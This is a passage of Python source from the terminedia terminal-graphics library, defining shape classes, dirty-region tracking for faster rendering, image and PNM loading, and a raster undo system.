object.\n return Drawing(\n set_fn=lambda pos, pixel=None: type(self).__setitem__(\n self, pos, pixel if pixel else self.context.char\n ),\n reset_fn=lambda pos: type(self).__setitem__(self, pos, EMPTY),\n get_fn=lambda pos: type(self).get_raw(self, pos),\n size_fn=self.get_size,\n context=self.context,\n direct_pixel=getattr(self, \"direct_pixel\", False)\n )\n\n def _get_highres(self, **kw):\n from terminedia.drawing import HighRes\n\n return HighRes(self, **kw)\n\n def _get_text(self):\n from terminedia.text import TextPlane\n\n return TextPlane(self)\n\n def clear(self, transparent=False):\n \"\"\"Clear the shape with empty spaces.\n\n params:\n transparent (bool): whether to use special transparency values\n\n if \"transparent\" is True, the shape is filled with the\n special TRANSPARENT value that make underlying shape characters, or existing tty content\n unchanged upon blitting.\n \"\"\"\n with self.context:\n if transparent:\n self.context.char = TRANSPARENT\n self.context.color = TRANSPARENT\n self.context.background = TRANSPARENT\n self.context.effects = TRANSPARENT\n self.context.force_transparent_ink = True\n else:\n self.context.char = EMPTY\n self.draw.fill()\n self.dirty_set()\n\n def spaces_to_transparency(self):\n from terminedia.transformers.library import AddAlpha\n from terminedia.transformers import TransformersContainer\n ct = TransformersContainer((AddAlpha,))\n with self.context(force_transparent_ink=True):\n ct.bake(self)\n\n\n#####################\n#\n# DIRTY Things:\n# instrumentation to dynamically track modified shape parts, allowing faster frame rendering\n#\n####################\n\nDirtyNode = namedtuple(\"DirtyNode\", \"tick untie rect source\")\n\n_none_ref = lambda : None\n\ndef _ensure_ref(obj):\n if isinstance(obj, ReferenceType):\n return obj\n if obj is None:\n return _none_ref\n if hasattr(obj.__class__, \"__weakref__\"):\n return ref(obj)\n return lambda: obj\n\nclass OrderedRegistry:\n # TODO: maybe use a linked list\n\n def __init__(self):\n self.untie = 0\n self.reset()\n\n def reset(self):\n self.data = []\n self.sources = {}\n self.rects = set()\n\n def push(self, node):\n if len(node) == 3:\n node = DirtyNode(node[0], self.untie, node[1], _ensure_ref(node[2]))\n else:\n node = DirtyNode(node[0], self.untie, node[2], _ensure_ref(node[3]))\n self.untie += 1\n\n t = node.rect.as_tuple\n self.sources.setdefault(t, []).append(node)\n self.rects.add(t)\n heapq.heappush(self.data, node)\n\n def reset_to(self, node):\n self.reset()\n self.push(node)\n\n #def clear_left(self, threshold):\n #if not self.data:\n #return\n #counter = 0\n #for node in self.data:\n #if node.tick <= threshold:\n #counter += 1\n #t = node.rect.as_tuple\n #if t in self.sources:\n #for node2 in self.sources[t]:\n #source = node2.source()\n #if hasattr(source, \"dirty_clear\"):\n #source.dirty_clear(threshold)\n #del self.sources[t]\n\n #else:\n #break\n #self.data[:counter] = []\n\n def __iter__(self):\n return iter(self.data)\n\n def __repr__(self):\n return f\"Registry <{self.data}>\"\n\n\n\nDIRTY_TILE_SIZE = 8\n\nclass ShapeDirtyMixin:\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.dirty_registry = OrderedRegistry()\n # Mark all shape as dirty:\n self.dirty_set()\n # collection of all changed pixels:\n self.dirty_pixels = set()\n self.dirty_saved_sprite_rects = set()\n self.dirty_sprite_rects_saved_at = 0\n\n def dirty_clear(self, threshold=None):\n tick = threshold if threshold is not None else get_current_tick()\n self.dirty_last_clear = tick\n self.dirty_registry.reset() # clear_left(tick)\n\n self.dirty_save_current_sprite_rects(tick)\n for sprite in self.sprites:\n sprite.shape.dirty_clear()\n\n def dirty_save_current_sprite_rects(self, tick):\n self.dirty_sprite_rects_saved_at = tick\n self.dirty_saved_sprite_rects = set()\n if not self.has_sprites:\n return\n for sprite in self.sprites:\n for rect in sprite.dirty_rects:\n self.dirty_saved_sprite_rects.update(sprite.dirty_rects)\n\n def dirty_set(self, rect=None):\n tick = get_current_tick()\n if rect is None:\n rect = Rect((0, 0), self.size)\n else:\n rect = Rect(rect) if not isinstance(rect, Rect) else rect\n self.dirty_registry.reset_to((tick, rect, None))\n\n def dirty_update(self):\n\n tick = get_current_tick()\n\n # If there is any time-dependant image change, there is no way\n # to predict what changes from one frame to the next - just mark\n # all shape as dirty.\n if any(\"tick\" in sig for transformer in self.context.transformers for sig in transformer.signatures.values()):\n self.dirty_set()\n return\n\n # Collect rects from sprites\n if self.has_sprites:\n for sprite in self.sprites:\n if not sprite.active:\n continue\n\n if any(\"tick\" in sig for transformer in sprite.transformers for sig in transformer.signatures.values()):\n self.dirty_registry.push((tick, sprite.rect, sprite.shape))\n else:\n for rect in sprite.dirty_rects:\n self.dirty_registry.push((tick, sprite.owner_coords(rect), sprite.shape))\n if self.sprites.killed_sprites:\n for rect in self.sprites.killed_sprites:\n self.dirty_registry.push((tick, rect, None))\n self.sprites.killed_sprites.clear()\n\n # mark dirty pixels\n\n tile_size = (DIRTY_TILE_SIZE, DIRTY_TILE_SIZE)\n self_rect = Rect((0, 0), self.size)\n for tile in self.dirty_pixels:\n rect = Rect(tile * DIRTY_TILE_SIZE, width_height=tile_size)\n rect = rect.intersection(self_rect)\n if not rect:\n continue\n self.dirty_registry.push((tick, rect, None))\n self.dirty_pixels = set()\n\n def dirty_mark_pixel(self, index):\n self.dirty_pixels.add(index // DIRTY_TILE_SIZE)\n\n @property\n def dirty_rects(self):\n self.dirty_update()\n # on purpose eager approach - the registry might be updated while rendering is taking place\n return self.dirty_registry.rects.copy()\n\n # return [node.rect for node in self.dirty_registry if self.dirty_registry.sources[node.rect.as_tuple][0].untie == node.untie]\n\n##############\n#\n# SHAPE:\n# Base class for all high-level imaging\n#\n#############\n\nclass Shape(ABC, ShapeApiMixin, ShapeDirtyMixin):\n \"\"\"'Shape' is intended to represent blocks of colors/backgrounds and characters\n to be applied in a rectangular area of the terminal. In this sense, it is\n more complicated than an \"Image\" that just care about a foreground color\n and alpha value for each pixel position.\n\n As internal data and rendering intents vary accross desired capabilities,\n there are subclasses to represent each intended use.\n\n \"\"\"\n\n PixelCls = pixel_factory(bool)\n _default_bg = False\n\n isroot = False\n\n @classmethod\n def new(cls, size, **kwargs):\n \"\"\"Creates an empty shape of this class.\n\n Args:\n - size (2-sequence): width x height of the new shape\n - **kwargs: keyword arguments either to the class empty-data builder\n (cls._data_func) - e.g. \"color\" - or for the\n class' __init__ - e.g. color_map.\n\n Creates a new empty shape, using given size and keyword parameters,\n which are dispatched as appropriate to build the empty pixel\n values or to the class itself.\n \"\"\"\n data_parameters = signature(cls._data_func).parameters.keys()\n data_kw = {}\n for name, value in list(kwargs.items()):\n if name in data_parameters:\n data_kw[name] = value\n kwargs.pop(name)\n data = cls._data_func(V2(size), **data_kw)\n return cls(data, **kwargs)\n\n def load_data(self, data, size=None):\n \"\"\"Sets internal data from an initial value structure.\n Args:\n - data: data structure containing the elements\n that will be set to inicial pixel values.\n Can be a single sequence width x height\n in size containing all elements\n to be assigned as pixels, or a\n height-sized sequence of width-sized sequences.\n - size (V2-like): width x height.\n\n Used to explictly set the initial values for a shape,\n will usually be called internally as part of the\n Shape initialization. If size is not given, and\n the passed data is 1D in nature, sie is assumed to\n be a single colum (1xN) shape. Strings are split\n at \"\\n\" and will be treated as 2D if multiline.\n \"\"\"\n if isinstance(data, str):\n data = data.split(\"\\n\")\n if not size:\n size = V2(len(data[0]), len(data))\n self.width = w = size[0]\n self.height = h = size[1]\n\n if len(data) == w * h:\n self.data = list(data)\n else:\n if len(data) != h:\n logger.warn(\n \"Passed size is inconsistent with data shape. Proceeding anyway\"\n )\n self.data = []\n for line in data:\n self.data.extend(list(line))\n return self.data\n\n def get_data_offset(self, pos):\n if pos[0] < 0 or pos[1] < 0 or pos[0] >= self.width or pos[1] >= self.height:\n return None\n return pos[1] * self.width + pos[0]\n\n def get_raw(self, pos):\n offset = self.get_data_offset(pos)\n if offset is None:\n # TODO: implement abyss_policy in context?\n return EMPTY\n return self.data[offset]\n\n @abstractmethod\n def __getitem__(self, pos):\n \"\"\"Common logic to create ShapeViews from slices.\n\n Pixel data retrieving is implemented in the subclasses.\n \"\"\"\n if isinstance(pos, Rect):\n roi = pos\n elif isinstance(pos, tuple) and isinstance(pos[0], slice):\n if any(pos[i].step not in (None, 1) for i in (0, 1)):\n raise NotImplementedError(\"Slice stepping not implemented for shapes\")\n roi = Rect(*pos)\n else:\n return None\n return ShapeView(self, roi)\n\n @abstractmethod\n def __setitem__(self, pos, value):\n \"\"\"\n\n Values for each pixel are: character, fg_color, bg_color\n \"\"\"\n raise NotImplementedError(\"This is meant as an abstract Shape class\")\n\n def __iter__(self):\n \"\"\"Iterates over all pixels in Shape\n\n For each pixel in the image, returns its position,\n its value, the foreground color, background color, and character_effects byte\n \"\"\"\n for y in range(self.height):\n for x in range(self.width):\n pos = V2(x, y)\n token = yield (pos, self[pos])\n if token is SKIP_LINE:\n yield None\n break\n\n def concat(self, *others, direction=Directions.RIGHT, **kwargs):\n \"\"\"Concatenates two given shapes side by side into a larger shape.\n\n Args:\n - other (Shape): Other shape to be concatenated.\n - direction (V2): Side which will be \"enlarged\" and on which the other shape\n will be placed. Most usefull values are Directions.RIGHT and Directions.DOWN\n - **kwargs: are passed down to the \"new\" constructor of the resulting shape.\n\n Creates a new shape combining two or more other shapes. If Shape _allowed_types differ,\n the logic in Drawing.blit will try to cast pixels to the one used in self.\n \"\"\"\n shapes = (self,) + others\n\n direction = V2(direction)\n\n h_size = abs(direction.x) * sum(s.width for s in shapes)\n v_size = abs(direction.y) * sum(s.height for s in shapes)\n new_size = V2(\n max(h_size, max(s.width for s in shapes)),\n max(v_size, max(s.height for s in shapes)),\n )\n\n new_shape = self.__class__.new(new_size, **kwargs)\n\n d = direction\n offset = V2(0 if d.x >= 0 else new_size.x, 0 if d.y >= 0 else new_size.y)\n\n # blit always take the top-left offset corner\n # so, depending on direction of concatenation,\n # offset have to be computed before or after blitting.\n for s in shapes:\n offset += (\n int(s.width * d.x if d.x < 0 else 0),\n int(s.height * d.y if d.y < 0 else 0),\n )\n new_shape.draw.blit(offset, s)\n offset += (\n int(s.width * d.x if d.x >= 0 else 0),\n int(s.height * d.y if d.y >= 0 else 0),\n )\n\n return new_shape\n\n def render(self, output=None, backend=\"ANSI\"):\n \"\"\"Renders shape contents into a text-output.\n Args:\n - backend (str): currently implemented \"ANSI\" - output type\n - output(Optional[Union[TextIO, BytesIO]])\n Output:\n ->Optional[Union[str, bytes]]\n\n Renders shape contents into content that can reprsent the image\n outside terminedia library. That is, if the shape is rendered with \"ANSI\",\n a text body, with the ESC encoded ANSI sequences for cursor positioning\n embeded will be generated. If this body is subsequnetly printed, the\n image in the Shape is reproduced on the terminal.\n\n If output is given, it should be a file-like object to which the contents\n of the shape will be written. Binary backends require a binary file. thenmethod returns None.\n If no output is given, the rendered contents are returned.\n \"\"\"\n backend = backend.upper()\n original_output = output\n\n self.dirty_set()\n\n if isinstance(output, (str, Path)):\n output = open(\n output, \"w\" + (\"t\" if backend in (\"ANSI\", \"HTML\") else \"b\")\n )\n\n if not original_output:\n output = StringIO()\n\n if backend == \"ANSI\":\n self._render_using_screen(output, backend)\n elif backend == \"HTML\":\n # FIXME: this somewhat violates some \"this module should not know about\n # specific backend stuff (HTML template).\"\n # However, the rendering machinnery only knows\n # about incremental rendering, and can't \"sandwhich\"\n # the final rendering. In any case, the outter HTML template\n # should be configurable in a near term future.\n from terminedia.html import full_body_template\n\n preamble, post_amble = full_body_template.split(\"{content}\")\n output.write(preamble)\n self._render_using_screen(output, backend)\n output.write(post_amble)\n elif backend == \"SNAPSHOT\":\n import pickle\n tmp = ShalowShapeRepr(self)\n pickle.dump(tmp, output)\n else:\n raise ValueError(f\"Output type {backend!r} not implemented\")\n if not original_output:\n return output.getvalue()\n\n def _render_using_screen(self, output, backend):\n from terminedia.screen import Screen\n\n if output is None:\n file = StringIO()\n else:\n file = output\n sc = Screen(size=V2(self.width, self.height), backend=backend, interactive=False)\n if backend==\"ANSI\":\n # generate a relocatable image\n sc.commands.__class__.last_pos = V2(0, 0)\n sc.commands.absolute_movement = False\n sc.commands.force_newlines = True\n # Starts recording all image operations on the internal journal\n sc.commands.__enter__()\n sc.blit((0, 0), self)\n # Ends journal-recording, but without calling __exit__\n # which does not allow passing an external file.\n sc.commands.stop_journal()\n # Renders all graphic ops as ANSI sequences + unicode into file:\n sc.commands.replay(output)\n output.write(\"\\x1b[0m\") # reset all ansi attributes\n\n def __repr__(self):\n cap = self.PixelCls.capabilities\n bck = cap.has_background\n ftn = cap.has_foreground\n eff = cap.has_effects\n size = self.get_size()\n rep = \"\".join(\n [\n self.__class__.__name__,\n \": [\\n\",\n \"value_type = \" + repr(cap.value_type) + \"\\n\" if cap.value_type else \"\",\n \"foreground\\n\" if ftn else \"\",\n \"background\\n\" if bck else \"\",\n \"effects\\n\" if eff else \"\",\n f\"size = {size.x}, {size.y}\\n\",\n \"]\",\n ]\n )\n return rep\n\n def _resize_data_one(self, new_size, data, fill_value):\n old_size = V2(self.width, self.height)\n lines = [data[i : i + old_size.x] for i in range(0, len(data), old_size.x)]\n new_data = []\n diff = new_size.x - old_size.x\n for y, line in zip(range(new_size.y), lines):\n\n if diff > 0:\n line.extend([fill_value] * diff)\n elif diff < 0:\n line[diff:] = []\n new_data.extend(line)\n\n y_diff = new_size.y - old_size.y\n if y_diff > 0:\n new_data.extend([fill_value] * new_size.x * y_diff)\n\n return new_data\n\n def _resize_data(self, new_size):\n self.data = self._resize_data_one(new_size, self.data, fill_value=getattr(self.context, \"background_char\", self.__class__._default_bg))\n\n def resize(self, new_size):\n new_size = V2(new_size)\n self._resize_data(V2(new_size))\n self.width, self.height = new_size\n if hasattr(self, \"rect\"):\n self.rect = Rect(new_size)\n self.dirty_set()\n\n\n# \"Virtualsubclassing\" - 2 days after I wrote there were no\n# practical uses for it.\n# With it, \"ShapeView\" can have \"__slots__\"\n@Shape.register\nclass ShapeView(ShapeApiMixin):\n __slots__ = (\"roi\", \"original\", \"_draw\", \"_high\", \"_text\")\n\n isroot = False\n\n def __init__(self, original, roi):\n self.original = original\n self.roi = Rect(roi)\n\n width = property(lambda s: s.roi.width)\n height = property(lambda s: s.roi.height)\n get_size = lambda s: s.roi.width_height\n\n def __getitem__(self, index):\n roi = self.roi\n if isinstance(index, Rect):\n return ShapeView(\n self.original,\n Rect(\n V2.max(roi.c1, (roi.c1 + index.c1)),\n V2.min((roi.c1 + index.c2), roi.c2),\n ),\n )\n if not 0 <= index[0] < roi.width or not 0 <= index[1] < roi.bottom:\n raise IndexError(f\"Value out of limits f{roi.width_height}\")\n return self.original[roi.c1 + index]\n\n def __setitem__(self, index, value):\n roi = self.roi\n if not 0 <= index[0] < roi.width or not 0 <= index[1] < roi.bottom:\n raise IndexError(f\"Value out of limits {roi.width_height}\")\n self.original[roi.c1 + index] = value\n\n __iter__ = Shape.__iter__\n\n def __getattribute__(self, attr):\n # Attributes not proxied in ShapeView\n if attr in {\n \"roi\",\n \"original\",\n \"width\",\n \"height\",\n \"size\",\n \"get_size\",\n \"draw\",\n \"high\",\n \"text\",\n \"isroot\",\n \"_draw\",\n \"_high\",\n \"_text\",\n \"_get_drawing\",\n \"_get_highres\",\n \"_get_text\",\n }:\n return super().__getattribute__(attr)\n return getattr(self.original, attr)\n\n def __repr__(self):\n return f\"View {self.roi} of {self.original}\"\n\n\nclass ValueShape(Shape):\n\n PixelCls = pixel_factory(bool, has_foreground=True)\n\n _data_func = staticmethod(lambda size, color=(0, 0, 0): [[color] * size.x] * size.y)\n _allowed_types = (Path, str, Sequence)\n\n def __init__(self, data, color_map=None, size=None, **kwargs):\n # TODO: make color_map work as a to-pixel palette infornmation\n # to L or I images - not only providing a color palette,\n # but also enabbling an \"palette color to character\" mapping.\n self.color_map = color_map\n if isinstance(data, self._allowed_types) or hasattr(data, \"read\"):\n self.load_data(data, size)\n else:\n raise NotImplementedError(f\"Can't load shape from {type(data).__name__}\")\n super().__init__(**kwargs)\n\n def __getitem__(self, pos):\n \"\"\"Composes a Pixel object for the given coordinates.\n \"\"\"\n v = super().__getitem__(pos)\n if v:\n return v\n\n color = self.get_raw(pos)\n if color is EMPTY:\n color = self.context.background\n\n return self.PixelCls(True, color)\n\n def __setitem__(self, pos, value):\n \"\"\"\n Values set for each pixel are 3-sequences with an RGB color value\n \"\"\"\n pos = V2(pos)\n self.dirty_mark_pixel(pos)\n color = value\n if isinstance(value, Pixel):\n v, color = value.get_values(self.context, self.PixelCls.capabilities)\n elif isinstance(value, (int, tuple, Color)):\n color = Color(value)\n elif isinstance(value, str):\n color = self.context.color if value != EMPTY else self.context.background\n self._raw_setitem(pos, color)\n\n def _raw_setitem(self, pos, color):\n offset = self.get_data_offset(pos)\n if offset is None:\n return\n self.data[offset] = color\n\n\nclass PGMShape(ValueShape):\n\n PixelCls = pixel_factory(bool, has_foreground=True)\n _allowed_types = (Path, str)\n\n def load_data(self, file_or_path, size=None):\n \"\"\"Will load data from a PGM/PPM file.\n Size parameter is ignored\n \"\"\"\n if not hasattr(file_or_path, \"read\"):\n file = open(file_or_path, \"rb\")\n else:\n file = file_or_path\n raw_data = file.read()\n if raw_data[0] == ord(b\"P\") and raw_data[2] in b\"\\r\\n\":\n return self._decode_pnm(raw_data)\n raise NotImplementedError(\"File format not supported. Try installing 'Pillow' \")\n\n def _decode_pnm(self, data):\n headers = []\n header_counter = 0\n offset = 0\n while True:\n line_end = data.find(b\"\\n\", offset)\n line = data[offset : line_end + 1]\n offset = line_end + 1\n if line.strip().startswith(b\"#\"):\n continue\n headers.append(line.strip())\n header_counter += 1\n if header_counter == 3:\n break\n type_, size, max_value = headers\n\n size = V2(*map(int, size.split()))\n max_value = int(max_value)\n\n self.width, self.height = size\n\n type_num = int(type_[1:2])\n if type_num == 2:\n # ASCII encoding, monochronme file\n ascii, values_per_pixel = True, 1\n elif type_num == 3:\n ascii, values_per_pixel = True, 3\n elif type_num == 5:\n ascii, values_per_pixel = False, 1\n elif type_num == 6:\n ascii, values_per_pixel = False, 3\n else:\n raise NotImplementedError(\n f\"File not supported. PNM with magic number: {type_.decode!r}\"\n )\n\n data = data[offset:]\n if ascii:\n data = [int(v) for v in data.split()]\n if len(data) != size.x * size.y * values_per_pixel:\n logger.warn(\"Malformed PNM file. Trying to continue anyway\\n\")\n\n data = [value / max_value for value in data]\n if values_per_pixel == 1:\n data = [(value, value, value) for value in data]\n else:\n data = [tuple(data[i : i + 3]) for i in range(0, len(data), 3)]\n self.data = data\n\n\nclass ImageShape(ValueShape):\n \"\"\"Relies on Python Imaging Library to load and handle image data.\n\n The internal \"data\" member is a straighout PIL.Image instance,\n and one is free to use PIL drawing and image manipulation APIs\n to draw on it.\n\n Important: on instantiating these shapes, Terminedia will\n try to auto-scale down/resample the image to compensate for\n the aspect-ratio of text imags. Pass the parameter `auto_scale=False`\n to `__init__` or `__new__` to preserve the exact size of the\n PIL Image.\n\n \"\"\"\n\n PixelCls = pixel_factory(bool, has_foreground=True)\n\n _data_func = staticmethod(\n lambda size, mode=\"RGB\", color=(0, 0, 0): PILImage.new(mode, size, color=color)\n )\n if PILImage:\n _allowed_types = (str, Path, PILImage.Image)\n\n def load_data(self, file_or_path, size=None, half_height=False):\n \"\"\"Will load data from an image file using PIL,\n\n If \"size\" is not passed, the native image size is used.\n Otherwise it should be a 2-sequence: if both numbers\n are given, that is used as final image size.\n If one component of \"size\" is \"None\", the other\n one is used to scale the image, keeping its aspect ratio.\n\n As due to the nature of character blocks, keeping the aspect ratio can\n lead to a strange 1:2 final display, pass \"half_height=True\"\n to keep the same visual aspect ratio for full blocks.\n (hint: you can load the full height and blit\n the resulting shape to a square 1/2 block drawable instead)\n\n \"\"\"\n if isinstance(file_or_path, PILImage.Image):\n img = file_or_path\n else:\n img = PILImage.open(file_or_path)\n img_size = V2(img.width, img.height)\n if size is None:\n size = img_size\n else:\n size = V2(size) #- (1, 1)\n if size.x is None:\n size = V2(img_size.x * (size.y / img_size.y) , size.y).as_int\n elif size.y is None:\n size = V2(size.x, img_size.y * (size.x / img_size.x)).as_int\n\n pixel_ratio = 1 if not half_height else 0.5\n\n if size.x != img_size.x or size.y * pixel_ratio != img_size.y:\n ratio_x = size.x / img_size.x\n ratio_y = (size.y / img_size.y) * pixel_ratio\n img = img.resize(size.as_int, PILImage.BICUBIC)\n\n self.width, self.height = img.width, img.height\n\n if img.mode in (\"L\", \"P\", \"I\"):\n img = img.convert(\"RGB\")\n elif img.mode in (\"LA\", \"PA\"):\n img = img.convert(\"RGBA\")\n self.data = img\n\n def get_raw(self, pos):\n return self.data.getpixel(pos)\n\n def _raw_setitem(self, pos, color):\n if isinstance(color, Color):\n color = tuple(color)\n self.data.putpixel(pos, color)\n\n def resize(self, new_size):\n self.data = self.data.resize(new_size)\n self.width, self.height = self.data.width, self.data.height\n\n def clear(self, transparent=False):\n img = self.data\n # FIXME: might need to check and upgrade the image to RGBA first\n color = tuple(self.context.background) if not transparent else (0, 0, 0, 0)\n img.paste(tuple(self.context.background), [0,0, img.size[0], img.size[1]])\n\n\nclass PalettedShape(Shape):\n \"\"\"'Shape' class intended to represent images, using a color-map to map characters to block colors.\n\n Args:\n - data (multiline string or list of strings): character map to be used as pixels\n - color_map (optional mapping): maps characters to RGB colors.\n This class have no special per pixel values for background or character - each\n block position will read as \"False\" or \"True\" depending only on the\n underlying character in the input data being space (0x20) or any other thing.\n \"\"\"\n\n foreground = True\n background = False\n arbitrary_chars = False\n effects = False # FUTURE: support for bold, blink, underline...\n\n PixelCls = pixel_factory(bool, has_foreground=True)\n _default_bg = False\n\n def __init__(self, data, color_map=None):\n if color_map is None:\n color_map = {} # any char != EMPTY or \".\" paints with current context color\n self.color_map = color_map\n if isinstance(data, (str, list)):\n self.load_paletted(data)\n return\n elif isinstance(data, Path) or hasattr(data, \"read\"):\n self.load_file(data)\n return\n super().__init__()\n raise NotImplementedError(f\"Can't load shape from {type(data).__name__}\")\n\n def load_paletted(self, data):\n\n # Legacy boolean shape - deservers another, separate, Shape subclass\n # if color_map is None:\n # self.PixelCls = pixel_factory(bool, has_foreground=False)\n\n if isinstance(data, str):\n data = data.split(\"\\n\")\n self.width = width = max(len(line) for line in data)\n self.height = height = len(data)\n\n new_data = []\n for line in data:\n # For string-based shapes, '.' is considered\n # as whitespace - this allows multiline\n # strings defining shapes that otherwise would\n # be distorted by program editor trailing space removal.\n new_data.append(f\"{{line:<{width}s}}\".format(line=line).replace(\".\", EMPTY))\n\n self.load_data(new_data, V2(width, height))\n\n def __getitem__(self, pos):\n \"\"\"Values for each pixel are: character, fg_color, bg_color, effects.\n \"\"\"\n v = super().__getitem__(pos)\n if v:\n return v\n char = self.get_raw(pos)\n value = bool(char != EMPTY)\n\n # TODO: Legacy: when this class doubled as \"BooleanShape\".\n # (remove comment block when BooleanShape is implemented)\n # if self.color_map:\n # foreground_arg = (self.color_map.get(char, DEFAULT_FG),)\n # else:\n # foreground_arg = ()\n\n foreground_arg = self.color_map.get(char, CONTEXT_COLORS)\n if not isinstance(foreground_arg, Color):\n foreground_arg = Color(foreground_arg)\n return self.PixelCls(value, foreground_arg)\n\n def __setitem__(self, pos, value):\n \"\"\"\n Values set for each pixel are: character - only spaces (0x20) or \"non-spaces\" are\n taken into account for PalettedShape\n \"\"\"\n pos = V2(pos)\n self.dirty_mark_pixel(pos)\n type_ = self.PixelCls.capabilities.value_type\n self.raw_setitem(pos, type_(value))\n\n def _raw_setitem(self, pos, value):\n self.data[pos[1] * self.width + pos[0]] = type_(value)\n\n\n\nclass PixelDict(ChainMap):\n \"\"\"Cached ChainMap\"\"\"\n def __init__(self, maps=None):\n # Chainmap uses a plain list, still, maps are pilld top-most on the left-side.\n # go figure!\n super().__init__(maps or {})\n self.maps = deque(self.maps)\n self.cache = {}\n self._sentinel = object()\n\n def __setitem__(self, key, value):\n self.cache[key] = value\n super().__setitem__(key, value)\n\n def __getitem__(self, key):\n value = self.cache.get(key, self._sentinel)\n if value is self._sentinel:\n value = super().__getitem__(key)\n self.cache[key] = value\n return value\n\n def clear(self):\n self.maps = [{}]\n self.cache.clear()\n\n def pop(self):\n self.cache.clear()\n return self.maps.popleft()\n\n def push(self, map=None):\n if map:\n self.cache.clear()\n self.maps.appendleft(map or {})\n\n\nclass _UNDO_START_MARK:\n pass # sentinel\n\nclass _UNDO_IN_PROGRESS_MARK:\n pass # sentinel\n\n\nclass RasterUndo:\n \"\"\"Controls and offer the API for raster undo-capability\n\n \"\"\"\n # FIXME: possibly we will need extracontext.context instead of threading.local\n # (maybe even contextvars.ContextVar could work)\n _undo_registry = threading.local()\n\n def __init__(self, *args, undo_active=False, max_undo_steps=100, **kw):\n # self.__lock = threading.Lock()\n self.max_undo_steps = max_undo_steps\n self.redo_data = []\n self.undo_active = undo_active\n super().__init__(*args, **kw)\n\n def __undo_exit(self): #, ext_type, exc_value, tb):\n with self.__lock:\n self.__undo_deph -= 1\n # we don't pop or merge undo-groups: that is up to the app do by calling other functions;\n\n def undo(self, n=1):\n for i in range(n):\n if len(self.data.maps) <= 1:\n break\n self.redo_data.append(self.data.pop())\n if isinstance(self, ShapeDirtyMixin):\n self.dirty_set()\n\n def redo(self, n=1):\n for i in range(n):\n if not self.redo_data:\n break\n self.data.maps.push(self.redo_data.pop())\n if isinstance(self, ShapeDirtyMixin):\n self.dirty_set()\n\n def undo_clear(self, n=1):\n \"\"\"Merge all pixel data into base, and clear undo history\"\"\"\n base = self.data.maps[-1]\n for step in self.data.maps[-2::-1]:\n base.update(step)\n self.data.clear()\n self.data.maps[0] = base\n\n @classmethod\n def undoable(cls, func):\n \"\"\"Decorator - apply on functions and methods that will use Raster functions so that\n they automatically start an undo_group.\n\n '@FullShape.undoable'\n \"\"\"\n return cls._inner_undoable(func, _inner_func=False)\n\n @classmethod\n def _inner_undoable(cls, func, *, _inner_func=True):\n \"\"\"Undo marker, but for 'final' methods inside the undoable-shape class itself:\n this will finally know the actual instance where undoing is expected,\n and will interact with tokens set-up in the outher function/methods\n (decorated with 'undoable') to actually create the undo-group dictionary to\n be stacked.\n \"\"\"\n @wraps(func)\n def undo_wrapper(*args, **kwargs):\n class_markers = getattr(cls._undo_registry, \"class_markers\", None)\n if class_markers is None:\n class_markers = cls._undo_registry.class_markers = {}\n outter_level = False\n if \"state\" not in class_markers:\n # FIXME: the 'key' here would be a unique 'chain-call-lineage'\n # starting on the outermost undoable function, and that\n # would not be mixed across threads/asyncio_tasks\n # meanwhile, the fixed key \"state\" will do\n class_markers[\"state\"] = _UNDO_START_MARK\n outter_level = True\n if _inner_func and class_markers[\"state\"] is _UNDO_START_MARK:\n self = args[0]\n # new undo group\n if self.undo_active:\n self.data.push()\n class_markers[\"state\"] = _UNDO_IN_PROGRESS_MARK\n self.verify_and_merge_max_undo_groups()\n # FIXME: maybe think of a non-linear redo strategy?\n self.redo_data.clear()\n try:\n result = func(*args, **kwargs)\n finally:\n if outter_level:\n del class_markers[\"state\"]\n return result\n\n return undo_wrapper\n\n def undo_group_start(self):\n if self.undo_active:\n class_markers = getattr(self.__class__._undo_registry, \"class_markers\", None)\n class_markers[\"state\"] = _UNDO_START_MARK\n self.verify_and_merge_max_undo_groups()\n\n def undo_group_end(self):\n class_markers = getattr(self.__class__._undo_registry, \"class_markers\", None)\n if class_markers.get(\"state\") is not None:\n del class_markers[\"state\"]\n\n def verify_and_merge_max_undo_groups(self):\n while len(self.data.maps) > self.max_undo_steps + 1:\n # merge the third-to-last and second-to-last groups:\n if self.max_undo_steps >= 2:\n self.data.maps[-2].update(self.data.maps[-3])\n del self.data.maps[-3]\n else:\n self.data.maps[-1].update(self.data.maps[-2])\n del self.data.maps[-2]\n\n\nclass FullShape(RasterUndo, Shape):\n \"\"\"Shape class carrying all possible data plus kitchen sink\n\n This class is easier instantiated via the terminedia.shape factory function\n\n Args:\n - data: a sequence with 4 planes (sequences), each a sequence with n-rows\n sequences of m-width elements. The first one should carry character\n data: a unicode sequence representing a single glyph. The second\n and 3rd should contain color values, and the 4th an integer\n representing text effects according to Effects values.\n \"\"\"\n\n PixelCls = pixel_factory(\n str,\n has_foreground=True,\n has_background=True,\n has_effects=True,\n translate_dots=False,\n )\n _default_bg = EMPTY\n direct_pixel = True\n\n @staticmethod\n def _data_func(size, context=None):\n size = V2(size).as_int\n if context is None:\n import terminedia\n context = terminedia.context\n return [\n [EMPTY * size.x] * size.y,\n [context.foreground] * size.x * size.y,\n [context.background] * size.x * size.y,\n [context.effects] * size.x * size.y,\n ]\n\n def __init__(self, data, **kw):\n self.width = w = len(data[0][0])\n self.height = h = len(data[0])\n self.rect = Rect((w,h))\n self.load_data(data, (w,h))\n #self.value_data, self.fg_data, self.bg_data, self.eff_data = (\n #self.load_data(plane, (w, h)) for plane in data\n #)\n # self.data is created as a side-effect in load_data\n #del self.data\n super().__init__(**kw)\n\n def load_data(self, data_planes, size):\n original_undo = getattr(self, \"undo_active\", False)\n self.undo_active = False\n w, h = size\n self.data = PixelDict()\n data_planes[0] = chain(*data_planes[0])\n iter_data = zip(*data_planes)\n for y in range(h):\n for x in range(w):\n self._raw_setitem((x, y), next(iter_data))\n self.undo_active = original_undo\n\n def get_raw(self, pos):\n if isinstance(pos, list):\n pos = V2(pos)\n value = self.data.get(pos, None) if pos in self.rect else None\n\n if value is None:\n value = [EMPTY, self.context.color, self.context.background, self.context.effects]\n self.data[pos] = value\n if self.undo_active:\n # mutations have to be written back, so they are placed in to the chainned undo_group\n value = value[:]\n return value\n\n def __getitem__(self, pos):\n \"\"\"Values for each pixel are: character, fg_color, bg_color, effects.\n \"\"\"\n v = super().__getitem__(pos)\n if v:\n return v\n\n value = self.get_raw(pos)\n pixel = self.PixelCls(*value)\n if self.context.transformers:\n pixel = self.context.transformers.process(self, pos, pixel)\n if self.has_sprites:\n pixel = self.sprites.get_at(pos, pixel)\n return pixel\n\n @RasterUndo._inner_undoable\n def 